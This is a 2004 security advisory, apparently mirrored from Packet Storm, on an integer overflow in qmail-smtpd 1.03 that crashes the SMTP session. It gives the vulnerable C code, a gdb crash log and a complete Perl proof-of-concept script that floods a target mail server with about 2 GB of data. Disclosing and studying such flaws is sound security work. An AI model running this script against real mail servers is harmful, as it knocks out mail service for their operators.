Georgi Guninski security advisory #65, 2004 - Qmail version 1.03 is susceptible to a couple attacks. A crash in qmail-smtpd occurs with a long SMTP session. The crash is not global, it affects only the current SMTP session. It is also possible to trigger a segmentation violation (SEGV) from the network.
10dae39fc506d25c870163518f0077627ecaf939966caa0aad04678186ced065<!DOCTYPE doctype PUBLIC "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<link rel="stylesheet" title="Default" href="main.css">
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title>Lame crash in qmail-smtpd, yet still qmail much better than windows</title>
</head>
<body style="color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
<center>
<h2>Lame crash in qmail-smtpd,
yet still qmail much better than windows</h2>
</center>
<table border="0" cellspacing="0" cellpadding="0" width="90%"
align="center">
<tbody>
<tr>
<td width="100%">
<table border="0" width="100%">
<tbody>
<tr>
<td valign="top" nowrap="nowrap" width="16%"
bgcolor="#f1f0ef"><img src="logo2.gif" alt="cyrillic logo"> <br>
<a href="index.html">Home</a> <br>
<b>Security</b> <br>
<a href="browsers.html" class="sux">Internet Explorer</a> <br>
<a href="win2k.html" class="sux">Windows 2000</a> <br>
<a href="exploit.html">AIX</a> <br>
<a href="netscape.html">Netscape</a> <br>
<a href="misc.html">Misc</a> <br>
<b>Other</b> <br>
<a href="greets.html">Links</a> <br>
<a href="me.html">Services</a> <br>
<a href="menews.html">In the news</a> <br>
<a href="rand/index.html">Random stuff</a> <br>
<b>Contact</b> <br>
<a href="mailto:guninski@guninski.com">guninski@guninski.com</a></td>
<td valign="top" width="84%">
<div style="margin-left: 1em;"><br>
Georgi Guninski security advisory #65, 2004<br>
<br>
<span style="font-weight: bold;">Version 2.0</span> -
corrects stuff from the original announcement.<br>
<br>
Lame crash in qmail-smtpd and memory overwrite according to gdb, yet
still qmail much better than windows<br>
<br>
Systems affected:<br>
qmail 1.03 on linux, don't know about other OSes.<br>
<br>
<br>
Risk: Very low.<br>
Date: 15 January 2004<br>
Updated: 26 January.<br>
Version 1 is not correct but available <a href="qmailcrash1.html">here</a><br>
<br>
Legal Notice:<br>
This Advisory is Copyright (c) 2004 Georgi Guninski.<br>
You may distribute it unmodified.<br>
You may not modify it and distribute it or distribute parts<br>
of it without the author's written permission - this especially applies
to<br>
so called "vulnerabilities databases" and securityfocus, microsoft, cert<br>
and mitre.<br>
If you want to link to this content use the URL:<br>
<a href="http://www.guninski.com/qmailcrash.html">http://www.guninski.com/qmailcrash.html</a><br>
Anything in this document may change without notice.<br>
<br>
Disclaimer:<br>
The information in this advisory is believed to be true though<br>
it may be false.<br>
The opinions expressed in this advisory and program are my own and<br>
not of any company. The usual standard disclaimer applies,<br>
especially the fact that Georgi Guninski is not liable for any damages<br>
caused by direct or indirect use of the information or
functionality<br>
provided by this advisory or program. Georgi Guninski bears no<br>
responsibility for content or misuse of this advisory or program or<br>
any derivatives thereof.<br>
<br>
Description:<br>
Actually there are two different problems:<br>
a) It is possible to crash qmail-smtpd 1.03 from remote with a long SMTP<br>
session. The crash is not global, it affects only the current SMTP
session.<br>
<br>
about a)<br>
It is possible to trigger segmentation violation (SEGV) in
qmail-smtpd 1.03 <br>
on linux from the network.<br>
<br>
The problem is in:<br>
void blast(hops)<br>
int *hops;<br>
...<br>
int pos; /* number of bytes since most recent \n, if fih */<br>
...<br>
if (pos < 9) {<br>
if (ch != "delivered"[pos])
if (ch != "DELIVERED"[pos]) flagmaybez = 0;<br>
...<br>
++pos;<br>
...<br>
<br>
When pos is incremented long enough, it becomes negative and the check <br>
(pos<9) passes while pos is around 0x80000000. <br>
Then "delivered"[pos] causes segmentation violation.<br>
<br>
Don't know whether RFC compliant message can trigger this.<br>
<br>
Here is a log of the crash:<br>
<div style="margin-left: 40px;">./qma4.pl localhost 25<br>
qmail-smtpd SEGV. Written by Georgi Guninski<br>
Will connect to localhost:25 fromaddr=you@email touser=postmaster<br>
length=2097152<br>
...<br>
<in another console><br>
ps awx | grep qmail-smtpd<br>
1810 ?
R 0:06 qmail-smtpd<br>
<br>
gdb attach 1810<br>
GNU gdb<br>
(gdb) cont<br>
<wait><br>
Program received signal SIGSEGV, Segmentation fault.<br>
0x0804937c in blast (hops=0xbffffd8c) at qmail-smtpd.c:321<br>
321
if (ch != "delivered"[pos]) if (ch != "DELIVERED"[pos]) flagmaybez = 0;<br>
(gdb) p pos<br>
$1 = -2147483648<br>
(gdb) p/x pos<br>
$2 = 0x80000000<br>
(gdb)<br>
<br>
</div>
----qma4.pl----<br>
<pre><font color="#a020f0">#!/usr/bin/perl -w</font><br><br><font
color="#0000ff">#Copyright Georgi Guninski\nCannot be used in vulnerability databases and </font><br><font
color="#0000ff">#similar stuff</font><br><br><font color="#a52a2a"><b>use </b></font>IO::Socket;<br><br><font
color="#a52a2a"><b>my</b></font> <font color="#008b8b">$port</font> = <font
color="#008b8b">$ARGV</font>[<font color="#ff00ff">1</font>];<br><font
color="#a52a2a"><b>my</b></font> <font color="#008b8b">$host</font> = <font
color="#008b8b">$ARGV</font>[<font color="#ff00ff">0</font>];<br><br><br><br><font
color="#a52a2a"><b>my</b></font> <font color="#008b8b">$socket</font> = IO::Socket::INET-><font
color="#a52a2a"><b>new</b></font>(<font color="#ff00ff">PeerAddr </font>=> <font
color="#008b8b">$host</font>,<font color="#ff00ff">PeerPort </font>=> <font
color="#008b8b">$port</font>,<font color="#ff00ff">Proto </font>=> <font
color="#ff00ff">"</font><font color="#ff00ff">TCP</font><font
color="#ff00ff">"</font>) || <font color="#a52a2a"><b>die</b></font> <font
color="#ff00ff">"</font><font color="#ff00ff">socket</font><font
color="#ff00ff">"</font>;<br><br><font color="#a52a2a"><b>my</b></font> <font
color="#008b8b">$req</font> = <font color="#ff00ff">"</font><font
color="#ff00ff">HELO a</font><font color="#6a5acd">\r\n</font><font
color="#ff00ff">"</font>;<br><font color="#a52a2a"><b>my</b></font> <font
color="#008b8b">$fromaddr</font>=<font color="#ff00ff">"</font><font
color="#ff00ff">you\@email</font><font color="#ff00ff">"</font>;<br><font
color="#a52a2a"><b>my</b></font> <font color="#008b8b">$touser</font>=<font
color="#ff00ff">"</font><font color="#ff00ff">postmaster</font><font
color="#ff00ff">"</font>;<br><br><font color="#a52a2a"><b>print</b></font> <font
color="#ff00ff">"</font><font color="#ff00ff">qmail-smtpd SEGV. Copyright Georgi Guninski</font><font
color="#6a5acd">\n</font><font color="#ff00ff">Cannot be used in vulnerability databases and similar stuff</font><font
color="#6a5acd">\n</font><font color="#ff00ff">Will connect to ${host}:${port} fromaddr=${fromaddr} touser=${touser}</font><font
color="#6a5acd">\n</font><font color="#ff00ff">"</font>;<br><br><font
color="#008b8b">$req</font> .= <font color="#ff00ff">"</font><font
color="#ff00ff">MAIL FROM: ${fromaddr}</font><font color="#6a5acd">\r\n</font><font
color="#ff00ff">"</font>;<br><font color="#008b8b">$req</font> .= <font
color="#ff00ff">"</font><font color="#ff00ff">RCPT TO: ${touser}</font><font
color="#6a5acd">\r\n</font><font color="#ff00ff">"</font>;<br><br><font
color="#008b8b">$req</font> .= <font color="#ff00ff">"</font><font
color="#ff00ff">DATA</font><font color="#6a5acd">\r\n</font><font
color="#ff00ff">"</font>;<br><br><br><font color="#008b8b">$req</font> .= <font
color="#ff00ff">"</font><font color="#ff00ff">1234567890</font><font
color="#ff00ff">"</font>;<br><br><font color="#0000ff">#my $x = "\ng" x 100;</font><br><font
color="#0000ff">#print $x;</font><br><br><font color="#a52a2a"><b>syswrite</b></font>(<font
color="#008b8b">$socket</font>,<font color="#008b8b">$req</font>,<font
color="#a52a2a"><b>length</b></font>(<font color="#008b8b">$req</font>));<br><br><font
color="#a52a2a"><b>my</b></font> <font color="#008b8b">$l1</font>= <font
color="#ff00ff">1024</font>*<font color="#ff00ff">1024</font>;<br><font
color="#a52a2a"><b>my</b></font> <font color="#008b8b">$p1</font> = <font
color="#ff00ff">"</font><font color="#ff00ff">gg</font><font
color="#ff00ff">"</font> x <font color="#008b8b">$l1</font>;<br><font
color="#a52a2a"><b>my</b></font> <font color="#008b8b">$pl</font> = <font
color="#ff00ff">2</font>*<font color="#008b8b">$l1</font>;<br><font
color="#a52a2a"><b>print</b></font> <font color="#ff00ff">"</font><font
color="#ff00ff">length=${pl}</font><font color="#6a5acd">\n</font><font
color="#ff00ff">"</font>;<br><font color="#a52a2a"><b>my</b></font> <font
color="#008b8b">$towrite</font> = <font color="#008b8b">$l1</font>*<font
color="#ff00ff">2050</font>;<br><font color="#a52a2a"><b>my</b></font> <font
color="#008b8b">$wri</font> = <font color="#ff00ff">0</font>;<br><font
color="#008b8b">$req</font> = <font color="#008b8b">$p1</font>;<br><font
color="#a52a2a"><b>while</b></font> (<font color="#008b8b">$wri</font> < <font
color="#008b8b">$towrite</font>)<br>{<br><font color="#a52a2a"><b>syswrite</b></font>(<font
color="#008b8b">$socket</font>,<font color="#008b8b">$req</font>,<font
color="#008b8b">$pl</font>);<br><font color="#a52a2a"><b>if</b></font> ( (<font
color="#008b8b">$wri</font> % <font color="#008b8b">$l1</font>) == <font
color="#ff00ff">0</font>) {<font color="#a52a2a"><b>print</b></font> <font
color="#ff00ff">"</font><font color="#ff00ff">written=</font><font
color="#ff00ff">"</font> . <font color="#008b8b">$wri</font>/<font
color="#008b8b">$l1</font> . <font color="#ff00ff">"</font><font
color="#6a5acd">\n</font><font color="#ff00ff">"</font>;}<br><font
color="#0000ff"># !!! uncomment the following lines to get qmail memory screw on linux according to gdb</font><br><font
color="#0000ff">#if ($wri/$l1 == 2044) </font><br><font color="#0000ff">#{</font><br><font
color="#0000ff">#syswrite($socket,"g\r\n",3);print "injected\n";</font><br><font
color="#0000ff">#};</font><br><font color="#008b8b">$wri</font> += <font
color="#008b8b">$pl</font>;<br>}<br><br><font color="#008b8b">$req</font> = <font
color="#ff00ff">"</font><font color="#ff00ff">test</font><font
color="#6a5acd">\r\n</font><font color="#ff00ff">"</font>;<br><font
color="#008b8b">$req</font> .= <font color="#ff00ff">"</font><font
color="#ff00ff">.</font><font color="#6a5acd">\r\n</font><font
color="#ff00ff">"</font>;<br><br><br><font color="#a52a2a"><b>syswrite</b></font>(<font
color="#008b8b">$socket</font>,<font color="#008b8b">$req</font>,<font
color="#a52a2a"><b>length</b></font>(<font color="#008b8b">$req</font>));<br><br><br><font
color="#a52a2a"><b>while</b></font>(<<font color="#008b8b">$socket</font>>)<br>{<br><font
color="#a52a2a"><b>print</b></font> <font color="#008b8b">$_</font>;<br>}<br><br><br><font
color="#a52a2a"><b>close</b></font> <font color="#008b8b">$socket</font>;<br><br></pre>
--------------<br>
<br>
Workaround: Not tested, but setting quota on the receiving email may
help.<br>
<br>
Vendor status:<br>
djb@cr.yp.to was notified about a) on Mon, 12 Jan 2004 16:06:06 +0200<br>
Message-Id: <200401121405.QAA06863@home.ntrl.net><br>
Didn't hear from him.<br>
His qsecretary wanted me to not be spammer and i confirmed i am not a<br>
spammer to: <br>
To: "The qsecretary program"
<djb-notbulkmail-22ecb0d6842839ad68e79ccb452a3f09@cr.yp.to><br>
<br>
Regards,<br>
Georgi Guninski<br>
http://www.guninski.com<br>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td> <br>
</td>
</tr>
</tbody>
</table>
<br>
<br>
<center>
<p>| <a href="index.html">Home</a> | <a href="browsers.html">Internet
Explorer</a> | <a href="win2k.html">Windows 2000</a> | <a
href="exploit.html">AIX</a> | <a href="netscape.html">Netscape</a> | <a
href="greets.html">Links</a> | <a href="index.html">More...</a> |</p>
</center>
<p><br>
</p>
<br>
<br>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed